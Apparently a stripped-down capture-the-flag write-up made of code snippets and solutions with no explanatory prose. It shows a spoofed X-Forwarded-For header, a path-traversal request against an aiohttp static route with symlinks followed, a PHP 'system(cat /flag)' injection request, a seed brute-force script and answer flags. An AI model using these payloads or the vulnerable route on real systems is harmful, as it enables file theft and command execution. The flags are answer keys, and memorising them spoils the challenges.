1

X-Forwarded-For: 31.33.33.7

1
2
3
4

app.add_routes([
    web.get('/', index),
    web.static('/files', './files', follow_symlinks=True)
])

1

/files/../../flag.txt

1

/b.php?1=system(%27cat /flag%27)%3b

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

s = 'bDacadn3af1b79cfCma8bse3F7msFdT_}11m8cicf_fdnbssUc{UarF_d3m6T813Usca?tf_FfC3tebbrrffca}Cd18ir1ciDF96n9_7s7F1cb8a07btD7d6s07a3608besfb7tmCa6sasdnnT11ssbsc0id3dsasTs?1m_bef_enU_91_1ta_417r1n8f1e7479ce}9}n8cFtF4__3sef0amUa1cmiec{b8nn9n}dndsef0?1b88c1993014t10aTmrcDn_sesc{a7scdadCm09T_0t7md61bDn8asan1rnam}sU'

s = []
import random
for i in range(1,1337):
    random.seed(i)
    out = ''.join(random.choices('DUCTF{aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa}',k=61*5))
    s.append(out)

for i in range(len(s)):
    if s[i][-3] == '}' and s[i][32] == '}':
        print(i)
        print(s[i])

1
2
3
4
5
6
7
8
9

s = 'bDacadn3af1b79cfCma8bse3F7msFdT_}11m8cicf_fdnbssUc{UarF_d3m6T813Usca?tf_FfC3tebbrrffca}Cd18ir1ciDF96n9_7s7F1cb8a07btD7d6s07a3608besfb7tmCa6sasdnnT11ssbsc0id3dsasTs?1m_bef_enU_91_1ta_417r1n8f1e7479ce}9}n8cFtF4__3sef0amUa1cmiec{b8nn9n}dndsef0?1b88c1993014t10aTmrcDn_sesc{a7scdadCm09T_0t7md61bDn8asan1rnam}sU'
ori = 'DUCTF{abcdefghijklmnopqrstuvwxyz0123456789ABEGHIJKLMNOPQRSVW}'

key = 'ID90KovkKEV47HJECiKB4b8kF7imFgTc}GuiB0a0ScEofIlxU3{U9sFngktQTRVkUlJ51qMcFMCrqLIIddMMJW}CoVRadw0aDFO6jO2Am7Fu04B5h7IyDAg6bP79pQhR4LxE4AqtC56m9xovjTzzxb4l3Paokol9mTl1Vi24LSnLvU2HVnVyWneG7swjRSw8Ae7O38}H}jRJFqFe2crbLSP5tUWzJta80{IBjfOv}NvgxLMh1GIRB0zOHrPueyzhKTtdJDvcl8l3{KAm3gKgCiPOTchyAiN6z4DfB5b9jwsvWt}bU'
l = [i for i in range(61)]
for i in range(len(key)):
    l[ori.find(key[i])] = s[i]
for i in l:
    print(i,end='')

1

DUCTF{ThanksEl0nWeCantCall1tTheTw1tterFl4gN0w}

1

DUCTF{durrangan_lookout}

1

DUCTF{H. Dana_Bowers_Memorial_Vista_Point}

1

DUCTF{maldon}

1

DUCTF{milawa}